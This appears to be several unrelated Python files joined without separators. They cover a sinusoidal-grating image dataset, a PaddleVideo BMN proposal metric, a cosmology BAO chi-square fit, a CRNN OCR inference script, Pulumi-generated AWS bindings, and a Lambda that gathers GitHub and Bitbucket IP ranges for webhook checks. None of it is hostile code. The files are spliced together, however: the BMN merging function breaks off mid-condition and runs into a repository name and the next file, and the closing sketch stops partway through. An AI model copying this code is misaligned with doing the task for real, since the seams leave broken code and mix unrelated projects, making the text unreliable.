''' Draw a sinusoidal grating that changes value across y axis ''' x = np.arange(size[0]) y = np.arange(size[1]) X,Y = np.meshgrid(x,y) Z = np.sin(2*np.pi * frequency * (Y/size[0]) + phase_shift) return Z def mask_circle_solid(pil_img, background_color, blur_radius, offset=0): ''' 'pil_img' becomes a circle inside a 'background_color' rectangle ''' background = Image.new(pil_img.mode, pil_img.size, background_color) offset = blur_radius * 2 + offset mask = Image.new("L", pil_img.size, 0) draw = ImageDraw.Draw(mask) draw.ellipse((offset, offset, pil_img.size[0] - offset, pil_img.size[1] - offset), fill=255) mask = mask.filter(ImageFilter.GaussianBlur(blur_radius)) return Image.composite(pil_img, background, mask) #return pil_img def circular_sinegrate(frequency, rotation, image_size=(256,256), phase_shift=0): ''' Generate a circular sinusoidal grating. frequency (float) : frequency of the sinusoid rotation (float) : counterclockwise rotation of the sinusoid in degrees phase_shift (float): move phase right/left. 
Radians size (int,int) : size of the output image ''' np_sinegrate = y_sinusoid(image_size, frequency, phase_shift) rotated_sinegrate = ndimage.rotate(np_sinegrate, rotation, reshape=False) pil_sinegrate = Image.fromarray(((rotated_sinegrate*127)+128).astype(np.uint8)) # convert [-1,1] to [0,255] return mask_circle_solid(pil_sinegrate, background_color=128, blur_radius=1, offset=18) def freq_transform(x): return x / 30 + 0.25 # cpd (cycles per degree) -> will be later converted to regular cycles per image def orient_transform(y): return np.deg2rad((9/10 * y) + 20) # radians -> will be later converted to degrees def rotate_points(points, angle=np.pi/4): ''' Rotate a set of points around the center of mass of the points angle in radians ''' center = np.mean(points,axis=0) rotation_matrix = np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]]) return np.dot(points - center, rotation_matrix) + center def generate_params(mean=[30,50], cov=[[10,0],[0,150]], size=100, categorization_scheme='rb'): distribution = scipy.stats.multivariate_normal.rvs(mean=mean, cov=cov, size=size) if categorization_scheme == 'ii': distribution = rotate_points(distribution, np.pi/4) return np.array([[freq_transform(x), orient_transform(y)] for x,y in distribution]) class SineGrates(Dataset): def __init__(self, cat_scheme='rb', dist_params = None, visual_angle='5', length=100, image_size=(256,256), transform=None, randomize_phase=True): ''' PyTorch Sinusoidal Grating image dataset generator cat_scheme (string): categorization scheme- 'rb'(rule-based) or 'ii'(information-integration) visual_angle (float): angle in degrees that the image occupies in the human visual field length (int): arbitrary length of the dataset. Data is generated on-the-fly using the distribution defined by `cat_scheme`. 
image_size (int,int): pixel size of output image ''' self.cat_scheme=cat_scheme #self.dist_params = dist_params self.visual_angle = visual_angle self.length = length self.image_size = image_size self.transform = transform self.randomize_phase = randomize_phase #if dist_params is None: if self.cat_scheme == 'rb': assert len(np.array(dist_params['a_means']).shape) == 2, "Rule-based scheme's 'a_means' should be a 2-d list" assert len(np.array(dist_params['b_means']).shape) == 2, "Rule-based scheme's 'b_means' should be a 2-d list" assert len(np.array(dist_params['a_covariances']).shape) == 3, "Rule-based scheme's 'a_covariances' should be a 3-d list" assert len(np.array(dist_params['b_covariances']).shape) == 3, "Rule-based scheme's 'b_covariances' should be a 3-d list" elif self.cat_scheme == 'ii': assert len(np.array(dist_params['a_means']).shape) == 1, "Rule-based scheme's 'a_means' should be a 1-d list" assert len(np.array(dist_params['b_means']).shape) == 1, "Rule-based scheme's 'b_means' should be a 1-d list" assert len(np.array(dist_params['a_covariances']).shape) == 2, "Rule-based scheme's 'a_covariances' should be a 2-d list" assert len(np.array(dist_params['b_covariances']).shape) == 2, "Rule-based scheme's 'b_covariances' should be a 2-d list" self.parse_params(dist_params) def save_dataset(self, path, extension='png'): self.generate_dataset() path = Path(path) if os.path.exists(path/'A'): shutil.rmtree(path/'A') os.makedirs(path/'A') if os.path.exists(path/'B'): shutil.rmtree(path/'B') os.makedirs(path/'B') for i, (label, pil_image) in enumerate(self.a_dataset): pil_image.save(path/'A'/f'{i}.{extension}') for i, (label, pil_image) in enumerate(self.b_dataset): pil_image.save(path/'B'/f'{i}.{extension}') def generate_dataset(self): # label 0 refers to 'a' condition # label 1 refers to 'b' condition self.a_dataset = [(0, self.get_image(parameters[0], parameters[1], randomize_phase=self.randomize_phase)) for parameters in self.a_params] self.b_dataset = [(1, self.get_image(parameters[0], parameters[1], randomize_phase=self.randomize_phase)) for parameters in self.b_params] def parse_params(self, dist_params): if self.cat_scheme == 'rb': # in 'rb' condition, the parameters are composed of two distributions. 
# here we generate paramers for each of the two and fuse them into one self.a1_params = generate_params(mean=dist_params['a_means'][0], cov=dist_params['a_covariances'][0], size=self.length//2, categorization_scheme=self.cat_scheme) self.a2_params = generate_params(mean=dist_params['a_means'][1], cov=dist_params['a_covariances'][1], size=self.length//2, categorization_scheme=self.cat_scheme) self.a_params = np.vstack((self.a1_params, self.a2_params)) self.b1_params = generate_params(mean=dist_params['b_means'][0], cov=dist_params['b_covariances'][0], size=self.length//2, categorization_scheme=self.cat_scheme) self.b2_params = generate_params(mean=dist_params['b_means'][1], cov=dist_params['b_covariances'][1], size=self.length//2, categorization_scheme=self.cat_scheme) self.b_params = np.vstack((self.b1_params, self.b2_params)) elif self.cat_scheme == 'ii': self.a_params = generate_params(mean=dist_params['a_means'], cov=dist_params['a_covariances'], size=self.length, categorization_scheme=self.cat_scheme) self.b_params = generate_params(mean=dist_params['b_means'], cov=dist_params['b_covariances'], size=self.length, categorization_scheme=self.cat_scheme) def get_image(self, frequency, orientation, randomize_phase=True): freq = float(frequency) * float(self.visual_angle) orientation = np.rad2deg(orientation) phase_shift = random.uniform(0, 2*np.pi) if randomize_phase else 0 img = circular_sinegrate(freq, orientation, image_size=self.image_size, phase_shift=phase_shift) return img def __len__(self): return self.length * 2 # since 'a' and 'b' are each self.length items. def __getitem__(self, idx): fetched_data = list((self.a_dataset + self.b_dataset)[idx]) if self.transform is not None: fetched_data[1] = self.transform(fetched_data[1]) return fetched_data def set_dist_params(self, new_dist_params): ''' Use this setter function to update self.dist_params after instantiating class. Used for interactive distribution parameter setting via ipywidgets ''' self.parse_params(new_dist_params) def plot_final(self): ''' Return figure representing the distribution of final dataset Usage: plt.show(dataset.plot_final()) where dataset: an instance of this dataset class ''' #plt.rcParams['figure.figsize'] = (5,5) if self.cat_scheme == 'rb': plt_figure = plt.figure(figsize=(5,5)) #axarr = plt_figure.add_subplot(1,1,1) plt.scatter(self.a1_params[:,0], self.a1_params[:,1], s=60, marker='+', color='black') plt.scatter(self.a2_params[:,0], self.a2_params[:,1], s=60, marker='+', color='black') plt.scatter(self.b1_params[:,0], self.b1_params[:,1], facecolors='none', edgecolors='gray') plt.scatter(self.b2_params[:,0], self.b2_params[:,1], facecolors='none', edgecolors='gray') plt.axis([0.0, 4.0, 0.0, 1.6]) plt.yticks(np.arange(0, 2.1, 0.5)) plt.xticks(np.arange(0,4.1,1)) elif self.cat_scheme == 'ii': plt_figure = plt.figure(figsize=(5,5)) plt.scatter(self.a_params[:,0], self.a_params[:,1], s=60, marker='+', color='black') plt.scatter(self.b_params[:,0], self.b_params[:,1], facecolors='none', edgecolors='gray') plt.axis([0.0, 4.0, 0.0, 1.6]) plt.yticks(np.arange(0, 2.1, 0.5)) plt.xticks(np.arange(0,4.1,1)) else: print(f"Category type 'self.cat_scheme': {self.cat_scheme} is not supported.") fig = plt.figure() fig.canvas.draw() #data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8) #data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) return fig if __name__=="__main__": dataset = SineGrates(cat_scheme='rb', length=200) print(next(iter(dataset)))# Copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License" # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. import os, pickle, tqdm import json import numpy as np import pandas as pd import multiprocessing as mp from .registry import METRIC from .base import BaseMetric from .ActivityNet import ANETproposal from paddlevideo.utils import get_logger logger = get_logger("paddlevideo") def iou_with_anchors(anchors_min, anchors_max, box_min, box_max): """Compute jaccard score between a box and the anchors. """ len_anchors = anchors_max - anchors_min int_xmin = np.maximum(anchors_min, box_min) int_xmax = np.minimum(anchors_max, box_max) inter_len = np.maximum(int_xmax - int_xmin, 0.) union_len = len_anchors - inter_len + box_max - box_min jaccard = np.divide(inter_len, union_len) return jaccard def boundary_choose(score_list): """Choose start and end boundary from score. """ max_score = max(score_list) mask_high = (score_list > max_score * 0.5) score_list = list(score_list) score_middle = np.array([0.0] + score_list + [0.0]) score_front = np.array([0.0, 0.0] + score_list) score_back = np.array(score_list + [0.0, 0.0]) mask_peak = ((score_middle > score_front) & (score_middle > score_back)) mask_peak = mask_peak[1:-1] mask = (mask_high | mask_peak).astype('float32') return mask def soft_nms(df, alpha, t1, t2): ''' df: proposals generated by network; alpha: alpha value of Gaussian decaying function; t1, t2: threshold for soft nms. ''' df = df.sort_values(by="score", ascending=False) tstart = list(df.xmin.values[:]) tend = list(df.xmax.values[:]) tscore = list(df.score.values[:]) rstart = [] rend = [] rscore = [] while len(tscore) > 1 and len(rscore) < 101: max_index = tscore.index(max(tscore)) tmp_iou_list = iou_with_anchors(np.array(tstart), np.array(tend), tstart[max_index], tend[max_index]) for idx in range(0, len(tscore)): if idx != max_index: tmp_iou = tmp_iou_list[idx] tmp_width = tend[max_index] - tstart[max_index] if tmp_iou > t1 + (t2 - t1) * tmp_width: tscore[idx] = tscore[idx] * np.exp( -np.square(tmp_iou) / alpha) rstart.append(tstart[max_index]) rend.append(tend[max_index]) rscore.append(tscore[max_index]) tstart.pop(max_index) tend.pop(max_index) tscore.pop(max_index) newDf = pd.DataFrame() newDf['score'] = rscore newDf['xmin'] = rstart newDf['xmax'] = rend return newDf def soft_nms_for_merging(proposal_dict, alpha=0.4, t1=0.55, t2=0.9, dscale=4): ''' proposal_dict: proposals generated by network; alpha: alpha value of Gaussian decaying function; t1, t2: threshold for soft nms. 
''' #df = df.sort_values(by="score", ascending=False) sorted_proposal = sorted(proposal_dict, key=lambda x:x["score"], reverse=True) tstart = [] tend = [] tscore = [] for pp in sorted_proposal: tstart.append(pp["segment"][0]) tend.append(pp["segment"][1]) tscore.append(pp["score"]) rstart = [] rend = [] rscore = [] while len(tscore) > 1 and len(rscore) < 101: max_index = tscore.index(max(tscore)) tmp_iou_list = iou_with_anchors(np.array(tstart), np.array(tend), tstart[max_index], tend[max_index]) for idx in range(0, len(tscore)): if idx != max_index: tmp_iou = tmp_iou_list[idx] tmp_width = (tend[max_index] - tstart[max_index])/dscale if tmp_iou > t1 + (t2 - t1) * tmp_width: tscore[idx] = tscore[idx] * np.exp( -np.square(tmp_iou) / alpha) rstart.append(tstart[max_index]) rend.append(tend[max_index]) rscore.append(tscore[max_index]) tstart.pop(max_index) tend.pop(max_index) tscore.pop(max_index) new_proposal = [] for i in range(len(rscore)): pp = {} pp['score'] = round(rscore[i], 2) pp["segment"] = [round(rstart[i], 2), round(rend[i], 2)] new_proposal.append(pp) return new_proposal @METRIC.register class BMNMetric(BaseMetric): """ Metrics for BMN. Two Stages in this metric: (1) Get test results using trained model, results will be saved in BMNMetric.result_path; (2) Calculate metrics using results file from stage (1). """ def __init__(self, data_size, batch_size, tscale, dscale, file_path, ground_truth_filename, subset, output_path, result_path, get_metrics=True, log_interval=100, to_merge=False): """ Init for BMN metrics. Params: get_metrics: whether to calculate AR@N and AUC metrics or not, default True. """ super().__init__(data_size, batch_size, log_interval) assert self.batch_size == 1, " Now we just support batch_size==1 test" assert self.world_size == 1, " Now we just support single-card test" self.tscale = tscale self.dscale = dscale self.file_path = file_path self.ground_truth_filename = ground_truth_filename self.subset = subset self.output_path = output_path self.result_path = result_path self.get_metrics = get_metrics self.to_merge = to_merge if not os.path.isdir(self.output_path): os.makedirs(self.output_path) if not os.path.isdir(self.result_path): os.makedirs(self.result_path) self.video_dict, self.video_list = self.get_dataset_dict( self.file_path, self.subset) def get_dataset_dict(self, file_path, subset): annos = json.load(open(file_path)) video_dict = {} for video_name in annos.keys(): video_subset = annos[video_name]["subset"] if subset in video_subset: video_dict[video_name] = annos[video_name] video_list = list(video_dict.keys()) video_list.sort() return video_dict, video_list def update(self, batch_id, data, outputs): """update metrics during each iter """ fid = data[4].numpy() pred_bm, pred_start, pred_end = outputs pred_bm = pred_bm.numpy() pred_start = pred_start[0].numpy() pred_end = pred_end[0].numpy() snippet_xmins = [1.0 / self.tscale * i for i in range(self.tscale)] snippet_xmaxs = [ 1.0 / self.tscale * i for i in range(1, self.tscale + 1) ] cols = ["xmin", "xmax", "score"] video_name = self.video_list[fid[0]] pred_bm = pred_bm[0, 0, :, :] * pred_bm[0, 1, :, :] start_mask = boundary_choose(pred_start) start_mask[0] = 1. end_mask = boundary_choose(pred_end) end_mask[-1] = 1. 
score_vector_list = [] for idx in range(self.dscale): for jdx in range(self.tscale): start_index = jdx end_index = start_index + idx if end_index < self.tscale and start_mask[ start_index] == 1 and end_mask[end_index] == 1: xmin = snippet_xmins[start_index] xmax = snippet_xmaxs[end_index] xmin_score = pred_start[start_index] xmax_score = pred_end[end_index] bm_score = pred_bm[idx, jdx] conf_score = xmin_score * xmax_score * bm_score score_vector_list.append([xmin, xmax, conf_score]) score_vector_list = np.stack(score_vector_list) video_df = pd.DataFrame(score_vector_list, columns=cols) video_df.to_csv(os.path.join(self.output_path, "%s.csv" % video_name), index=False) if batch_id % self.log_interval == 0: logger.info("Processing................ batch {}".format(batch_id)) def accumulate(self): """accumulate metrics when finished all iters. """ # check clip index of each video #Stage1 self.bmn_post_processing(self.video_dict, self.subset, self.output_path, self.result_path) if self.get_metrics: result_path = os.path.join(self.result_path, "bmn_results_validation.json") if self.to_merge: merged_result_path = os.path.join(self.result_path, "bmn_merged_results_validation.json") self.merging_output_per_video(self.tscale, self.ground_truth_filename, result_path, merged_result_path) result_path = merged_result_path logger.info("[TEST] calculate metrics...") #Stage2 uniform_average_nr_proposals_valid, uniform_average_recall_valid, uniform_recall_valid = self.cal_metrics( self.ground_truth_filename, result_path, max_avg_nr_proposals=100, tiou_thresholds=np.linspace(0.5, 0.9, 9), # orig: (0.5, 0.95, 10) subset='validation') logger.info("AR@1; AR@5; AR@10; AR@100") self.ar_1 = 100 * np.mean(uniform_recall_valid[:, 0]) self.ar_5 = 100 * np.mean(uniform_recall_valid[:, 4]) self.ar_10 = 100 * np.mean(uniform_recall_valid[:, 9]) self.ar_100 = 100 * np.mean(uniform_recall_valid[:, -1]) logger.info("%.02f %.02f %.02f %.02f" % (self.ar_1, self.ar_5, self.ar_10, self.ar_100)) self.auc = int(np.trapz(uniform_average_recall_valid, uniform_average_nr_proposals_valid)*100)/100. def bmn_post_processing(self, video_dict, subset, output_path, result_path): video_list = list(video_dict.keys()) global result_dict result_dict = mp.Manager().dict() pp_num = 12 num_videos = len(video_list) num_videos_per_thread = int(num_videos / pp_num) processes = [] for tid in range(pp_num - 1): tmp_video_list = video_list[tid * num_videos_per_thread:(tid + 1) * num_videos_per_thread] p = mp.Process(target=self.video_process, args=(tmp_video_list, video_dict, output_path, result_dict)) p.start() processes.append(p) tmp_video_list = video_list[(pp_num - 1) * num_videos_per_thread:] p = mp.Process(target=self.video_process, args=(tmp_video_list, video_dict, output_path, result_dict)) p.start() processes.append(p) for p in processes: p.join() result_dict = dict(result_dict) output_dict = { "version": "VERSION 1.3", "results": result_dict, "external_data": {} } outfile = open( os.path.join(result_path, "bmn_results_%s.json" % subset), "w") json.dump(output_dict, outfile) outfile.close() def video_process(self, video_list, video_dict, output_path, result_dict, snms_alpha=0.4, snms_t1=0.55, snms_t2=0.9): for vidx, video_name in enumerate(video_list): if vidx % self.log_interval == 0: logger.info("Processing video........" 
+ video_name) df = pd.read_csv(os.path.join(output_path, video_name + ".csv")) if len(df) > 1: df = soft_nms(df, snms_alpha, snms_t1, snms_t2) video_duration = video_dict[video_name]["duration_second"] proposal_list = [] for idx in range(min(100, len(df))): tmp_prop={"score":df.score.values[idx], \ "segment":[max(0,df.xmin.values[idx])*video_duration, \ min(1,df.xmax.values[idx])*video_duration]} proposal_list.append(tmp_prop) result_dict[video_name[2:]] = proposal_list def cal_metrics(self, ground_truth_filename, proposal_filename, max_avg_nr_proposals=100, tiou_thresholds=np.linspace(0.5, 0.95, 10), subset='validation'): anet_proposal = ANETproposal(ground_truth_filename, proposal_filename, tiou_thresholds=tiou_thresholds, max_avg_nr_proposals=max_avg_nr_proposals, subset=subset, verbose=True, check_status=False) anet_proposal.evaluate() recall = anet_proposal.recall average_recall = anet_proposal.avg_recall average_nr_proposals = anet_proposal.proposals_per_video return (average_nr_proposals, average_recall, recall) def merging_output_per_video(self, win_t, ground_truth_filename, proposal_filename, merging_output_filename, snms_alpha=0.4, snms_t1=0.55, snms_t2=0.9): # 合并回提交文件 with open(ground_truth_filename, 'r', encoding='utf-8') as f: label_dict = json.load(f) val_file_name = label_dict['database'].keys() fps = label_dict['fps'] with open(proposal_filename, 'r', encoding='utf-8') as f: pred_dict = json.load(f) new_pred_dict = {"version":pred_dict["version"], "external_data": {}} results_dict = pred_dict["results"] new_results_dict = {} for file_name in tqdm.tqdm(val_file_name): frames_len = label_dict['database'][file_name]['num_frames'] clip_count = 1 proposal = [] for start_f in range(0, frames_len, win_t//2): end_f = start_f+win_t if end_fmatiasleize/tesis_licenciatura """ Created on Sun Feb 2 13:28:48 2020 @author: matias """ import numpy as np from numpy.linalg import inv from matplotlib import pyplot as plt import time import camb from camb import model, initialpower from scipy.integrate import cumtrapz as cumtrapz from scipy.integrate import simps as simps from scipy.interpolate import interp1d from scipy.constants import c as c_luz #metros/segundos c_luz_km = c_luz/1000 import sys import os from os.path import join as osjoin from pc_path import definir_path path_git, path_datos_global = definir_path() os.chdir(path_git) sys.path.append('./Software/Funcionales/') from funciones_int import Hubble_teorico from funciones_BAO import r_drag, r_drag_camb from funciones_LambdaCDM import H_LCDM #%% def chi_2_BAO(teo, data, errores): chi2 = np.sum(((data-teo)/errores)**2) return chi2 def Hs_to_Ds_old_data(zs, Hs, z_data, index): INT = cumtrapz(Hs**(-1), zs, initial=0) DA = (c_luz_km/(1 +zs)) * INT if index == 0: #DA aux = DA if index == 1: #DH aux = c_luz_km/Hs if index == 2: #DM aux = (1+zs) * DA if index == 3: #DV aux = ((1 +zs)**2 * DA**2 * (c_luz_km * zs/Hs)) ** (1/3) if index == 4: #H aux = Hs output = interp1d(zs,aux) return output(z_data) def params_to_chi2_BAO_old_data(theta, params_fijos, dataset, cantidad_zs=int(10**6),num_datasets=5): '''Dados los parámetros libres del modelo (omega, b y H0) y los que quedan params_fijos (n), devuelve un chi2 para los datos de BAO''' [omega_m, H_0] = theta zs_modelo = np.linspace(0.01, 3, cantidad_zs) H_modelo = H_LCDM(zs_modelo, omega_m, H_0) rd = r_drag_camb(omega_m,H_0) #Calculo del rd chies = np.zeros(num_datasets) for i in range(num_datasets): (z_data, valores_data, errores_data, rd_fid) = dataset[i] if i==0: #Dato de Da valores_data_2 = 
valores_data * (rd/rd_fid) errores_data_2 = errores_data * (rd/rd_fid) pass elif i==4: #Datos de H valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): valores_data_2[j] = valores_data[j] * (rd/rd_fid[j]) errores_data_2[j] = errores_data[j] * (rd/rd_fid[j]) else: valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): if rd_fid[j] != 1: valores_data_2[j] = valores_data[j] * (rd_fid[j]/rd) errores_data_2[j] = errores_data[j] * (rd_fid[j]/rd) else: #No hay que multiplicar x ningun factor valores_data_2[j] = valores_data[j] errores_data_2[j] = errores_data[j] outs = Hs_to_Ds_old_data(zs_modelo,H_modelo,z_data,i) chies[i] = chi_2_BAO(outs,valores_data_2,errores_data_2) if np.isnan(sum(chies))==True: print('Hay errores!') print(omega_m,H_0,rd) return np.sum(chies) if __name__ == '__main__': from scipy.constants import c as c_luz #metros/segundos from matplotlib import pyplot as plt import sys import os from os.path import join as osjoin from pc_path import definir_path path_git, path_datos_global = definir_path() #%% BAO os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_viejos') archivo_BAO = ['datos_BAO_da.txt','datos_BAO_dh.txt','datos_BAO_dm.txt', 'datos_BAO_dv.txt','datos_BAO_H.txt'] def leer_data_BAO(archivo_BAO): z, valores_data, errores_data, rd_fid = np.loadtxt(archivo_BAO, usecols=(0,1,2,4),unpack=True) return z, valores_data, errores_data, rd_fid dataset_BAO = [] for i in range(5): aux = leer_data_BAO(archivo_BAO[i]) dataset_BAO.append(aux) #%% num_datasets = 5 #[omega_m,H_0] = [0.33013649504023296, 66.48702802652504] [omega_m,H_0] = [0.298,73.5] zs_modelo = np.linspace(0.01, 3, 10**6) H_modelo = H_LCDM(zs_modelo, omega_m, H_0) rd = r_drag_camb(omega_m,H_0) #Calculo del rd legends = ['Da','Dh','Dm','Dv','H'] chies = np.zeros(num_datasets) for i in range(5): (z_data, valores_data, errores_data, rd_fid) = dataset_BAO[i] if i==0: #Dato de Da valores_data_2 = valores_data * (rd/rd_fid) errores_data_2 = errores_data * (rd/rd_fid) elif i==4: #Datos de H valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): valores_data_2[j] = valores_data[j] * (rd_fid[j]/rd) errores_data_2[j] = errores_data[j] * (rd_fid[j]/rd) else: valores_data_2 = np.zeros(len(valores_data)) errores_data_2 = np.zeros(len(errores_data)) for j in range(len(z_data)): if rd_fid[j] != 1: valores_data_2[j] = valores_data[j] * (rd/rd_fid[j]) errores_data_2[j] = errores_data[j] * (rd/rd_fid[j]) else: #No hay que multiplicar x ningun factor valores_data_2[j] = valores_data[j] errores_data_2[j] = errores_data[j] outs = Hs_to_Ds_old_data(zs_modelo,H_modelo,z_data,i) chies[i] = chi_2_BAO(outs,valores_data_2,errores_data_2) print(np.sum(chies)/(17-2)) plt.close() plt.figure(2) plt.grid() plt.errorbar(z_data,valores_data_2,errores_data_2,fmt='.r') plt.plot(z_data,outs,'.-b')#los puntos unidos por lineas, no es la forma real plt.title(legends[i]) plt.xlabel('z (redshift)') plt.ylabel(legends[i]) os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_viejos/Imagen') #os.chdir(path_git+'/Software/Estadística/Datos/BAO/Datos_sin_nuevos/Imagen') #plt.savefig('{}'.format(legends[i])) import argparse import os import tensorflow as tf import libs.utils as utils from libs.config import load_config from libs.infer import validation from nets.crnn import CRNN from libs.label_converter import LabelConverter from libs.img_dataset import ImgDataset 
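# A minimal sketch of the BAO construction used in the cosmology code above:
# integrate 1/H(z) to obtain a comoving distance, convert it to an
# angular-diameter distance, rescale the measurements by rd/rd_fid and form a
# diagonal chi^2.  Flat LCDM, the fiducial numbers and the fake data points are
# assumptions for illustration only; cumulative_trapezoid is the current SciPy
# name for the cumtrapz routine imported above.
import numpy as np
from scipy.integrate import cumulative_trapezoid
from scipy.interpolate import interp1d

C_KM_S = 299792.458  # speed of light in km/s

def H_lcdm(z, omega_m=0.3, H0=70.0):
    # Hubble rate of a flat LCDM model, in km/s/Mpc
    return H0 * np.sqrt(omega_m * (1.0 + z) ** 3 + 1.0 - omega_m)

zs = np.linspace(0.01, 3.0, 100_000)
Hs = H_lcdm(zs)
D_C = C_KM_S * cumulative_trapezoid(1.0 / Hs, zs, initial=0)  # comoving distance [Mpc]
D_A = D_C / (1.0 + zs)                                        # angular-diameter distance

z_data = np.array([0.38, 0.51, 0.61])        # placeholder redshifts
model = interp1d(zs, D_A)(z_data)
rd, rd_fid = 147.0, 148.0                    # placeholder sound-horizon values
data = 1.02 * model * (rd / rd_fid)          # fake measurements, rescaled as above
errors = 0.03 * model
print(np.sum(((data - model) / errors) ** 2))  # chi^2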
from parse_args import parse_args from parse_args import parse_infer_args # http://cv-tricks.com/tensorflow-tutorial/save-restore-tensorflow-models-quick-complete-tutorial/ def restore_ckpt(sess, checkpoint_dir): print("Restoring checkpoint from: " + checkpoint_dir) print('checkpoint_dir',checkpoint_dir) ckpt = tf.train.latest_checkpoint(checkpoint_dir) if ckpt is None: print("Checkpoint not found") exit(-1) meta_file = ckpt + '.meta' try: print('Restore graph from {}'.format(meta_file)) print('Restore variables from {}'.format(ckpt)) saver = tf.train.import_meta_graph(meta_file) saver.restore(sess, ckpt) except Exception: raise Exception("Can not restore from {}".format(checkpoint_dir)) step = ckpt.split('/')[-1].split('_')[1] return int(step) def infer(args): converter = LabelConverter(chars_file=args.chars_file) config = tf.ConfigProto(allow_soft_placement=True) with tf.Session(config=config) as sess: step = restore_ckpt(sess, args.ckpt_dir) # for node in sess.graph.as_graph_def().node: # print(node.name) # https://stackoverflow.com/questions/46912721/tensorflow-restore-model-with-sparse-placeholder labels_placeholder = tf.SparseTensor( values=sess.graph.get_tensor_by_name('labels/values:0'), indices=sess.graph.get_tensor_by_name('labels/indices:0'), dense_shape=sess.graph.get_tensor_by_name('labels/shape:0') ) feeds = { 'inputs': sess.graph.get_tensor_by_name('inputs:0'), 'is_training': sess.graph.get_tensor_by_name('is_training:0'), 'sequence_length': sess.graph.get_tensor_by_name('sequence_length:0'), 'labels': labels_placeholder } fetches = [ sess.graph.get_tensor_by_name('output:0'), # dense_decoded sess.graph.get_tensor_by_name('Mean_1:0'), # mean edit distance sess.graph.get_tensor_by_name('edit_distance:0') # batch edit distances ] ds_dirs = [] if args.load_sub_infer_dir: sub_names = utils.list_valid_sub_name(args.infer_dir) for sub_name in sub_names: sub_name_with_path = os.path.join(args.infer_dir, sub_name) if utils.is_dir(sub_name_with_path): ds_dirs.append(sub_name_with_path) else: ds_dirs.append(args.infer_dir) for ds_dir in ds_dirs: ds = ImgDataset(ds_dir, converter, args.infer_batch_size, shuffle=False, data_ordered=args.infer_data_ordered) validation(sess, feeds, fetches, ds, converter, args.result_dir, name='infer', print_batch_info=True, copy_failed=args.infer_copy_failed, step=step) def main(): args = parse_infer_args(infer=True) if args.gpu: dev = '/gpu:0' else: dev = '/cpu:0' with tf.device(dev): infer(args) if __name__ == '__main__': main() pulumi/pulumi-aws-native # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. 
import _utilities __all__ = [ 'GetSubnetNetworkAclAssociationResult', 'AwaitableGetSubnetNetworkAclAssociationResult', 'get_subnet_network_acl_association', 'get_subnet_network_acl_association_output', ] @pulumi.output_type class GetSubnetNetworkAclAssociationResult: def __init__(__self__, association_id=None): if association_id and not isinstance(association_id, str): raise TypeError("Expected argument 'association_id' to be a str") pulumi.set(__self__, "association_id", association_id) @property @pulumi.getter(name="associationId") def association_id(self) -> Optional[str]: return pulumi.get(self, "association_id") class AwaitableGetSubnetNetworkAclAssociationResult(GetSubnetNetworkAclAssociationResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetSubnetNetworkAclAssociationResult( association_id=self.association_id) def get_subnet_network_acl_association(association_id: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubnetNetworkAclAssociationResult: """ Resource Type definition for AWS::EC2::SubnetNetworkAclAssociation """ __args__ = dict() __args__['associationId'] = association_id if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('aws-native:ec2:getSubnetNetworkAclAssociation', __args__, opts=opts, typ=GetSubnetNetworkAclAssociationResult).value return AwaitableGetSubnetNetworkAclAssociationResult( association_id=__ret__.association_id) @_utilities.lift_output_func(get_subnet_network_acl_association) def get_subnet_network_acl_association_output(association_id: Optional[pulumi.Input[str]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSubnetNetworkAclAssociationResult]: """ Resource Type definition for AWS::EC2::SubnetNetworkAclAssociation """ ... beardnecks/aws-github-integration0 """Creates a list of the public IPs for Bitbucket and Github Fetches an updated list of Bitbucket and Github public server IPs to be used for authenticating webhooks in the GitPull lambda function """ import os import boto3 import requests def lambda_handler(event: dict, context): """Creates a list of the public IPs for Bitbucket and Github After creating a comma separated list the function uploads the file to an S3 bucket for use by the GitPull lambda :param event: Lambda event information from AWS - Not used :param context: Lambda context information from AWS - Not used :return: """ ip_bucket = os.environ["IPBucket"] # Bitbucket IPs resp = requests.get("https://ip-ranges.atlassian.com") bitbucket_resp = resp.json() valid_ips = "" for item in bitbucket_resp["items"]: valid_ips += item["cidr"] + "," # Github IPs resp = requests.get("https://api.github.com/meta") github_resp = resp.json() for ip in github_resp["web"]: valid_ips += ip + "," for ip in github_resp["api"]: valid_ips += ip + "," for ip in github_resp["git"]: valid_ips += ip + "," f = open("/tmp/ips", "wb") f.write(valid_ips.rstrip(",").encode()) # Strip to remove trailing comma f.close() s3 = boto3.client("s3") s3.upload_file("/tmp/ips", ip_bucket, "ips") print("Updated valid ips") """ Copyright (c) 2020, VRAI Labs and/or its affiliates. All rights reserved. This software is licensed under the Apache License, Version 2.0 (the "License") as published by the Apache Software Foundation. You may not use this file except in compliance with the License. 
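# A compact variation on the webhook IP-list lambda above, assuming the same two
# public endpoints: collect the Bitbucket and GitHub address ranges, join them
# into one comma-separated string, and upload it with put_object instead of
# writing a /tmp file first.  The bucket name and object key are placeholders.
import boto3
import requests

def collect_webhook_ips() -> str:
    # Bitbucket/Atlassian CIDR ranges
    ips = [item["cidr"] for item in requests.get("https://ip-ranges.atlassian.com").json()["items"]]
    # GitHub ranges used for web, API and git traffic (same keys as above)
    meta = requests.get("https://api.github.com/meta").json()
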